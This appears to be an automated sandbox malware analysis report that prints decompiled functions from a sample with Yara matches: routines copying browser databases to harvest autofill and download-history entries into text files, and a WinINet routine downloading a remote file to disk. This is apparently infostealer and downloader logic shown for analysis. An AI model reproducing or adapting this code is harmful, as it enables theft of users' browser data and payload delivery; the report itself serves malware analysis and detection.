									__eflags = _t147[0x14] - 0x10;
									if(_t147[0x14] >= 0x10) {
										_t147 =  *_t147;
									}
									lstrcatA(_t197, _t147);
									 *(_t198 - 4) = 3;
									E00404354(_t198 - 0x7a0, 1, 0);
								} else {
									_t151 =  *(_t198 - 0x730);
									if( *((intOrPtr*)(_t198 - 0x71c)) < 0x10) {
										_t151 = _t198 - 0x730;
									}
									lstrcatA(_t197, _t151);
								}
								lstrcatA(_t197, 0x43c8dc);
							}
							_t154 = 0;
						}
						 *(_t198 - 4) =  *(_t198 - 4) | 0xffffffff;
						E00404354(_t198 - 0x730, 1, _t154);
					}
				}
				E0040E631(_t198 - 0x7c4, _t198 - 0x7c0);
				return E00420888(_t154, _t198 - 0x7c4, _t198 - 0x7c0);
			}
























                                                                    0x0040878a
                                                                    0x00408794
                                                                    0x0040879c
                                                                    0x004087a5
                                                                    0x004087aa
                                                                    0x004087b0
                                                                    0x004087b2
                                                                    0x004087b8
                                                                    0x004087b8
                                                                    0x004087bb
                                                                    0x004087bc
                                                                    0x004087bc
                                                                    0x004087bf
                                                                    0x004087c5
                                                                    0x004087c5
                                                                    0x004087c8
                                                                    0x004087c9
                                                                    0x004087c9
                                                                    0x004087cc
                                                                    0x004087d0
                                                                    0x004087d6
                                                                    0x004087ea
                                                                    0x004087fd
                                                                    0x00408811
                                                                    0x00408823
                                                                    0x00408836
                                                                    0x0040883c
                                                                    0x00408842
                                                                    0x0040884c
                                                                    0x00408852
                                                                    0x00408858
                                                                    0x0040885b
                                                                    0x0040885b
                                                                    0x0040885d
                                                                    0x0040885e
                                                                    0x0040885e
                                                                    0x00408872
                                                                    0x00408884
                                                                    0x00408887
                                                                    0x00408890
                                                                    0x00408892
                                                                    0x00408892
                                                                    0x00408895
                                                                    0x0040889e
                                                                    0x004088ae
                                                                    0x004088ae
                                                                    0x004088a0
                                                                    0x004088a0
                                                                    0x004088ac
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004088ac
                                                                    0x004088be
                                                                    0x004088c3
                                                                    0x004088d2
                                                                    0x004088d7
                                                                    0x004088dd
                                                                    0x004088e9
                                                                    0x004088f0
                                                                    0x004088f7
                                                                    0x004088fe
                                                                    0x00408900
                                                                    0x00408912
                                                                    0x0040891c
                                                                    0x00408922
                                                                    0x00408928
                                                                    0x00408933
                                                                    0x0040893a
                                                                    0x0040893b
                                                                    0x0040893e
                                                                    0x0040894d
                                                                    0x00408951
                                                                    0x00408956
                                                                    0x0040895b
                                                                    0x00408961
                                                                    0x00408961
                                                                    0x00408963
                                                                    0x00408964
                                                                    0x00408964
                                                                    0x00408974
                                                                    0x00408991
                                                                    0x004089a2
                                                                    0x004089ab
                                                                    0x004089b1
                                                                    0x004089bd
                                                                    0x004089c3
                                                                    0x004089c5
                                                                    0x004089c5
                                                                    0x004089cc
                                                                    0x004089e0
                                                                    0x004089e6
                                                                    0x004089eb
                                                                    0x004089f1
                                                                    0x004089f1
                                                                    0x004089f4
                                                                    0x004089f5
                                                                    0x004089f5
                                                                    0x004089f5
                                                                    0x004089f8
                                                                    0x00408a04
                                                                    0x00408a16
                                                                    0x00408a1d
                                                                    0x00408a25
                                                                    0x00408a27
                                                                    0x00408a27
                                                                    0x00408a31
                                                                    0x00408a41
                                                                    0x00408a45
                                                                    0x00408a50
                                                                    0x00408a57
                                                                    0x00408a5d
                                                                    0x00408a68
                                                                    0x00408a71
                                                                    0x00408a92
                                                                    0x00408a9e
                                                                    0x00408ab0
                                                                    0x00408ab7
                                                                    0x00408abb
                                                                    0x00408abf
                                                                    0x00408ac1
                                                                    0x00408ac1
                                                                    0x00408ac5
                                                                    0x00408ad5
                                                                    0x00408ad9
                                                                    0x00408a73
                                                                    0x00408a7a
                                                                    0x00408a80
                                                                    0x00408a82
                                                                    0x00408a82
                                                                    0x00408a8a
                                                                    0x00408a8a
                                                                    0x00408ae4
                                                                    0x00408ae4
                                                                    0x00408aea
                                                                    0x00408aea
                                                                    0x00408aec
                                                                    0x00408af9
                                                                    0x00408af9
                                                                    0x00408900
                                                                    0x00408b0a
                                                                    0x00408b14

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00408794
                                                                    • lstrcatA.KERNEL32(?,00000000,000007CC,00408C3A,?,00000000), ref: 004087EA
                                                                    • lstrcatA.KERNEL32(?), ref: 004087FD
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00408811
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00408823
                                                                    • lstrcatA.KERNEL32(?), ref: 00408836
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00408895
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408974
                                                                    • lstrcatA.KERNEL32(?,00000000,00000078,000000FF,00000000,-0000000C,?,?,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408A31
                                                                    • lstrcatA.KERNEL32(?,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408A57
                                                                    • StrCmpCA.SHLWAPI(?,NULL,?,?,?,?,00000001,00000000,00000001), ref: 00408A69
                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,00000001,00000000,00000001), ref: 00408A8A
                                                                    • lstrcatA.KERNEL32(?,0043C8DC,00000001,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408AE4
                                                                      • Part of subcall function 0040E874: __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                      • Part of subcall function 0040E874: _memset.LIBCMT ref: 0040E8C9
                                                                      • Part of subcall function 0040E874: LocalAlloc.KERNEL32 ref: 0040E904
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,00000001,00000000,00000001), ref: 00408AC5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$H_prolog3_$AllocAttributesFileLocal_memmove_memset
                                                                    • String ID: NULL
                                                                    • API String ID: 1714093169-324932091
                                                                    • Opcode ID: 309355e712d810ed07439110930016a1af529719f6e9cd2804b494409bc20f41
                                                                    • Instruction ID: c1b642d60342ca033521cd0b8119711ec229398cff7ea87e4473c86e05902e12
                                                                    • Opcode Fuzzy Hash: 309355e712d810ed07439110930016a1af529719f6e9cd2804b494409bc20f41
                                                                    • Instruction Fuzzy Hash: F8A15C71D042299FEF25EB50CD85BD9B7B8EB05314F1040EAE10DA7191DB38AB89CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041001C Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 131stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 51%
                                                                    			E0041001C(CHAR* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				CHAR* _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				void* _t40;
				void* _t52;
				void* _t57;
				CHAR* _t63;
				CHAR* _t64;
				void* _t81;
				CHAR* _t84;
				signed int _t85;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t92;

				_t31 =  *0x443674; // 0x393162b1
				_v8 = _t31 ^ _t85;
				_v556 = _a4;
				_v548 = _a8;
				_v560 = _a12;
				_t73 = __ecx;
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v276,  *0x445fe0);
				_t40 = 0x1a;
				lstrcatA( &_v276, E00415EF6(_t40, _t92));
				CopyFileA(_t73,  &_v276, 1);
				E00426300( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v548, _v556);
				_t84 =  *0x445a98; // 0x4c9cb90
				_t52 =  *0x446248( &_v276,  &_v552);
				_t89 = _t86 + 0x30;
				if(_t52 == 0) {
					_t57 =  *0x4461fc(_v552, _t84, 0xffffffff,  &_v544, 0);
					_t90 = _t89 + 0x14;
					if(_t57 == 0) {
						_t84 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v544);
							if( *0x446218() != 0x64) {
								break;
							}
							_t63 =  *0x446238(_v544, 0);
							_t73 = _t63;
							_t64 =  *0x446238(_v544, 1);
							_t90 = _t90 + 0x10;
							_v548 = _t64;
							lstrcatA(_t84, _t63);
							lstrcatA(_t84, "\t");
							lstrcatA(_t84, _v548);
							lstrcatA(_t84, 0x43c8dc);
						}
						E0041CE7C(_v560,  &_v540,  *0x446320(_t84), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v552);
				}
				return E0041DA9B(DeleteFileA( &_v276), _t73, _v8 ^ _t85, _t81, 0, _t84);
			}



























                                                                    0x00410025
                                                                    0x0041002c
                                                                    0x00410034
                                                                    0x0041003e
                                                                    0x0041004d
                                                                    0x0041005d
                                                                    0x0041005f
                                                                    0x00410074
                                                                    0x0041007c
                                                                    0x0041008a
                                                                    0x0041009a
                                                                    0x004100a9
                                                                    0x004100c9
                                                                    0x004100cf
                                                                    0x004100e3
                                                                    0x004100e9
                                                                    0x004100ee
                                                                    0x00410105
                                                                    0x0041010b
                                                                    0x00410110
                                                                    0x00410129
                                                                    0x00410180
                                                                    0x00410180
                                                                    0x00410190
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00410134
                                                                    0x00410142
                                                                    0x00410144
                                                                    0x0041014a
                                                                    0x0041014f
                                                                    0x00410155
                                                                    0x00410161
                                                                    0x0041016e
                                                                    0x0041017a
                                                                    0x0041017a
                                                                    0x004101ab
                                                                    0x004101b0
                                                                    0x004101b9
                                                                    0x004101c6
                                                                    0x004101cc
                                                                    0x004101e8

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0041005F
                                                                    • lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 00410074
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0041008A
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0041009A
                                                                    • _memset.LIBCMT ref: 004100A9
                                                                    • wsprintfA.USER32 ref: 004100C9
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0041011C
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00410123
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00410155
                                                                    • lstrcatA.KERNEL32(00000000,0043F094), ref: 00410161
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0041016E
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0041017A
                                                                    • lstrlen.KERNEL32(00000000), ref: 00410193
                                                                    • DeleteFileA.KERNEL32(?), ref: 004101D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Autofill\%s_%s.txt
                                                                    • API String ID: 3976021866-3770965036
                                                                    • Opcode ID: feac73d224cccc530b82361e90b8a08ac407e886b983509641d44f17f04b081a
                                                                    • Instruction ID: 46b44cf328d46f16eda21532ab2267423a6c0cc384e10963aa6030855d83df24
                                                                    • Opcode Fuzzy Hash: feac73d224cccc530b82361e90b8a08ac407e886b983509641d44f17f04b081a
                                                                    • Instruction Fuzzy Hash: 9E416076900128BBCB11AFA4EC4DEDEBBBCFB0E311F1101A6F505E2161D7759A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F6A9 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 131stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 51%
                                                                    			E0040F6A9(CHAR* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				CHAR* _v548;
				char _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				void* _t40;
				void* _t52;
				void* _t57;
				CHAR* _t63;
				CHAR* _t64;
				void* _t81;
				CHAR* _t84;
				signed int _t85;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t92;

				_t31 =  *0x443674; // 0x393162b1
				_v8 = _t31 ^ _t85;
				_v556 = _a4;
				_v548 = _a8;
				_v560 = _a12;
				_t73 = __ecx;
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v276,  *0x445fe0);
				_t40 = 0x1a;
				lstrcatA( &_v276, E00415EF6(_t40, _t92));
				CopyFileA(_t73,  &_v276, 1);
				E00426300( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Downloads\\%s_%s.txt", _v548, _v556);
				_t84 =  *0x446190; // 0x4c90530
				_t52 =  *0x446248( &_v276,  &_v552);
				_t89 = _t86 + 0x30;
				if(_t52 == 0) {
					_t57 =  *0x4461fc(_v552, _t84, 0xffffffff,  &_v544, 0);
					_t90 = _t89 + 0x14;
					if(_t57 == 0) {
						_t84 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v544);
							if( *0x446218() != 0x64) {
								break;
							}
							_t63 =  *0x446238(_v544, 0);
							_t73 = _t63;
							_t64 =  *0x446238(_v544, 1);
							_t90 = _t90 + 0x10;
							_v548 = _t64;
							lstrcatA(_t84, _t63);
							lstrcatA(_t84, 0x43c8dc);
							lstrcatA(_t84, _v548);
							lstrcatA(_t84, "\n\n");
						}
						E0041CE7C(_v560,  &_v540,  *0x446320(_t84), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v552);
				}
				return E0041DA9B(DeleteFileA( &_v276), _t73, _v8 ^ _t85, _t81, 0, _t84);
			}



























                                                                    0x0040f6b2
                                                                    0x0040f6b9
                                                                    0x0040f6c1
                                                                    0x0040f6cb
                                                                    0x0040f6da
                                                                    0x0040f6ea
                                                                    0x0040f6ec
                                                                    0x0040f701
                                                                    0x0040f709
                                                                    0x0040f717
                                                                    0x0040f727
                                                                    0x0040f736
                                                                    0x0040f756
                                                                    0x0040f75c
                                                                    0x0040f770
                                                                    0x0040f776
                                                                    0x0040f77b
                                                                    0x0040f792
                                                                    0x0040f798
                                                                    0x0040f79d
                                                                    0x0040f7b6
                                                                    0x0040f80d
                                                                    0x0040f80d
                                                                    0x0040f81d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040f7c1
                                                                    0x0040f7cf
                                                                    0x0040f7d1
                                                                    0x0040f7d7
                                                                    0x0040f7dc
                                                                    0x0040f7e2
                                                                    0x0040f7ee
                                                                    0x0040f7fb
                                                                    0x0040f807
                                                                    0x0040f807
                                                                    0x0040f838
                                                                    0x0040f83d
                                                                    0x0040f846
                                                                    0x0040f853
                                                                    0x0040f859
                                                                    0x0040f875

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F6EC
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F701
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040F717
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F727
                                                                    • _memset.LIBCMT ref: 0040F736
                                                                    • wsprintfA.USER32 ref: 0040F756
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F7A9
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F7B0
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F7E2
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F7EE
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040F7FB
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C), ref: 0040F807
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F820
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F861
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Downloads\%s_%s.txt
                                                                    • API String ID: 3976021866-1964744946
                                                                    • Opcode ID: 108f5294c399d615b1ec86604388fed68030af679c65817414bb443450f9322a
                                                                    • Instruction ID: 93854743b5508c7da544320bb17b2dd8ee1c47936068203f90cfedc8e204cd6a
                                                                    • Opcode Fuzzy Hash: 108f5294c399d615b1ec86604388fed68030af679c65817414bb443450f9322a
                                                                    • Instruction Fuzzy Hash: 4D414076900118BBCB11AFA4EC4DEDEBB78FB0E311F1101B6F605E2161DB759A848F69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040F346 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 129stringmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 27%
                                                                    			E0040F346(CHAR* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t38;
				void* _t82;
				CHAR* _t85;
				signed int _t86;
				void* _t93;

				_t71 = __ebx;
				_t29 =  *0x443674; // 0x393162b1
				_v8 = _t29 ^ _t86;
				_v556 = _a4;
				_v552 = _a8;
				_v560 = _a12;
				E00426300( &_v276, 0, 0x104);
				lstrcatA( &_v276,  *0x445fe0);
				_t38 = 0x1a;
				lstrcatA( &_v276, E00415EF6(_t38, _t93));
				CopyFileA(__ebx,  &_v276, 1);
				E00426300( &_v540, 0, 0x104);
				wsprintfA( &_v540, "\\Autofill\\%s_%s.txt", _v552, _v556);
				_t85 =  *0x4460e4; // 0x4c90500
				_push( &_v548);
				_push( &_v276);
				if( *0x446248() == 0) {
					_push(0);
					_push( &_v544);
					_push(0xffffffff);
					_push(_t85);
					_push(_v548);
					if( *0x4461fc() == 0) {
						_t85 = HeapAlloc(GetProcessHeap(), 0, 0xf423f);
						while(1) {
							_push(_v544);
							if( *0x446218() != 0x64) {
								break;
							}
							lstrcatA(_t85,  *0x446238(_v544, 0));
							lstrcatA(_t85, " ");
							lstrcatA(_t85,  *0x446238(_v544, 1));
							lstrcatA(_t85, 0x43c8dc);
						}
						E0041CE7C(_v560,  &_v540,  *0x446320(_t85), 3);
					}
					 *0x44621c(_v544);
					 *0x44624c(_v548);
				}
				return E0041DA9B(DeleteFileA( &_v276), _t71, _v8 ^ _t86, _t82, 0, _t85);
			}



















                                                                    0x0040f346
                                                                    0x0040f34f
                                                                    0x0040f356
                                                                    0x0040f35d
                                                                    0x0040f367
                                                                    0x0040f376
                                                                    0x0040f386
                                                                    0x0040f39b
                                                                    0x0040f3a3
                                                                    0x0040f3b1
                                                                    0x0040f3c1
                                                                    0x0040f3d0
                                                                    0x0040f3f0
                                                                    0x0040f3f6
                                                                    0x0040f402
                                                                    0x0040f409
                                                                    0x0040f415
                                                                    0x0040f41b
                                                                    0x0040f422
                                                                    0x0040f423
                                                                    0x0040f425
                                                                    0x0040f426
                                                                    0x0040f437
                                                                    0x0040f450
                                                                    0x0040f49b
                                                                    0x0040f49b
                                                                    0x0040f4ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040f465
                                                                    0x0040f471
                                                                    0x0040f489
                                                                    0x0040f495
                                                                    0x0040f495
                                                                    0x0040f4c6
                                                                    0x0040f4cb
                                                                    0x0040f4d4
                                                                    0x0040f4e1
                                                                    0x0040f4e7
                                                                    0x0040f502

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040F386
                                                                    • lstrcatA.KERNEL32(?,?,?,?), ref: 0040F39B
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 0040F3B1
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040F3C1
                                                                    • _memset.LIBCMT ref: 0040F3D0
                                                                    • wsprintfA.USER32 ref: 0040F3F0
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040F443
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040F44A
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F465
                                                                    • lstrcatA.KERNEL32(00000000,0043F0DC), ref: 0040F471
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040F489
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040F495
                                                                    • lstrlen.KERNEL32(00000000), ref: 0040F4AE
                                                                    • DeleteFileA.KERNEL32(?), ref: 0040F4EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileHeap_memsetwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
                                                                    • String ID: \Autofill\%s_%s.txt
                                                                    • API String ID: 3976021866-3770965036
                                                                    • Opcode ID: 93fa9149362658374381cfa51570d99bb74ee8b793827b65e81f921bb222b050
                                                                    • Instruction ID: aabe5698964a7114d595a980c26595edce8cd510aadbdb82e2657ea6f526c2b1
                                                                    • Opcode Fuzzy Hash: 93fa9149362658374381cfa51570d99bb74ee8b793827b65e81f921bb222b050
                                                                    • Instruction Fuzzy Hash: E2416D76900118BFCB21ABA4EC4DEDEBB78EB0E311F1100B6F905E2161DB749A848F59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D708 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 124networkfilesleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E0040D708(char* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				int _t38;
				char* _t61;
				void* _t62;
				void* _t67;
				void* _t70;
				void* _t71;
				void* _t74;
				signed int _t75;
				void* _t77;

				_t67 = __edx;
				_t75 = _t77 - 0x4a4;
				_t35 =  *0x443674; // 0x393162b1
				 *(_t75 + 0x4a0) = _t35 ^ _t75;
				_t61 = __ecx;
				 *(_t75 - 0x80) =  *(_t75 + 0x4ac);
				 *(_t75 - 0x74) = 0;
				 *(_t75 - 0x78) = 0x100;
				_t38 = InternetOpenA(0x43c8d8, 1, 0, 0, 0);
				 *(_t75 - 0x70) = _t38;
				if(_t38 != 0) {
					_push("https");
					_push(E0040D694(__ecx, 0x100, 0));
					if( *0x446458() == 0) {
						 *(_t75 - 0x74) = 1;
					}
					 *((intOrPtr*)(_t75 - 0x6c)) = 0;
					do {
						_push(0);
						if( *(_t75 - 0x74) == 0) {
							_push(0x100);
						} else {
							_push(0x800100);
						}
						 *(_t75 - 0x64) = InternetOpenUrlA( *(_t75 - 0x70), _t61, 0, 0, ??, ??);
						if(HttpQueryInfoA( *(_t75 - 0x64), 0x13, _t75 + 0x3a0, _t75 - 0x78, 0) == 0) {
							goto L10;
						} else {
							_push("200");
							_push(_t75 + 0x3a0);
							if( *0x446458() != 0) {
								Sleep(0x3e8);
								goto L10;
							}
						}
						break;
						L10:
						 *((intOrPtr*)(_t75 - 0x6c)) =  *((intOrPtr*)(_t75 - 0x6c)) + 1;
					} while ( *((intOrPtr*)(_t75 - 0x6c)) < 3);
					_t71 = CreateFileA( *(_t75 - 0x80), 0x40000000, 3, 0, 2, 0x80, 0);
					while(InternetReadFile( *(_t75 - 0x64), _t75 - 0x60, 0x400, _t75 - 0x68) != 0) {
						if( *(_t75 - 0x68) <= 0 || WriteFile(_t71, _t75 - 0x60,  *(_t75 - 0x68), _t75 - 0x7c, 0) != 0 &&  *(_t75 - 0x68) ==  *(_t75 - 0x7c)) {
							if( *(_t75 - 0x68) >= 0x400) {
								continue;
							}
						}
						break;
					}
					E00426300(_t75 - 0x60, 0, 0x400);
					CloseHandle(_t71);
					InternetCloseHandle( *(_t75 - 0x64));
					_t38 = InternetCloseHandle( *(_t75 - 0x70));
				}
				_pop(_t70);
				_pop(_t74);
				_pop(_t62);
				return E0041DA9B(_t38, _t62,  *(_t75 + 0x4a0) ^ _t75, _t67, _t70, _t74);
			}
















                                                                    0x0040d708
                                                                    0x0040d709
                                                                    0x0040d716
                                                                    0x0040d71d
                                                                    0x0040d73d
                                                                    0x0040d73f
                                                                    0x0040d742
                                                                    0x0040d745
                                                                    0x0040d748
                                                                    0x0040d74e
                                                                    0x0040d753
                                                                    0x0040d759
                                                                    0x0040d763
                                                                    0x0040d76c
                                                                    0x0040d76e
                                                                    0x0040d76e
                                                                    0x0040d775
                                                                    0x0040d778
                                                                    0x0040d778
                                                                    0x0040d77c
                                                                    0x0040d785
                                                                    0x0040d77e
                                                                    0x0040d77e
                                                                    0x0040d77e
                                                                    0x0040d792
                                                                    0x0040d7ae
                                                                    0x00000000
                                                                    0x0040d7b0
                                                                    0x0040d7b0
                                                                    0x0040d7bb
                                                                    0x0040d7c4
                                                                    0x0040d7cb
                                                                    0x00000000
                                                                    0x0040d7cb
                                                                    0x0040d7c4
                                                                    0x00000000
                                                                    0x0040d7d1
                                                                    0x0040d7d1
                                                                    0x0040d7d4
                                                                    0x0040d7f3
                                                                    0x0040d825
                                                                    0x0040d7ff
                                                                    0x0040d823
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040d823
                                                                    0x00000000
                                                                    0x0040d7ff
                                                                    0x0040d841
                                                                    0x0040d84a
                                                                    0x0040d853
                                                                    0x0040d85c
                                                                    0x0040d85c
                                                                    0x0040d868
                                                                    0x0040d869
                                                                    0x0040d86c
                                                                    0x0040d879

                                                                    APIs
                                                                    • InternetOpenA.WININET(0043C8D8,00000001,00000000,00000000,00000000), ref: 0040D748
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6AF
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6BC
                                                                      • Part of subcall function 0040D694: lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                      • Part of subcall function 0040D694: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    • StrCmpCA.SHLWAPI(00000000,https), ref: 0040D764
                                                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,00000100,00000000), ref: 0040D78C
                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 0040D7A6
                                                                    • StrCmpCA.SHLWAPI(?,200), ref: 0040D7BC
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D7CB
                                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0040D7ED
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D80E
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0040D831
                                                                    • _memset.LIBCMT ref: 0040D841
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040D84A
                                                                    • InternetCloseHandle.WININET(?), ref: 0040D853
                                                                    • InternetCloseHandle.WININET(?), ref: 0040D85C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseFileHandle_memset$Open$CrackCreateHttpInfoQueryReadSleepWritelstrlen
                                                                    • String ID: 200$https
                                                                    • API String ID: 1246493084-2945048398
                                                                    • Opcode ID: 813b0a1d36ad4756c26ff7a7086154858533a4ab01b242261a442c48494a4aa6
                                                                    • Instruction ID: 8e8014ae1652a0f9a123a9585a6d4da9dbdcaa0db3a0f6ab633003790f0059d4
                                                                    • Opcode Fuzzy Hash: 813b0a1d36ad4756c26ff7a7086154858533a4ab01b242261a442c48494a4aa6
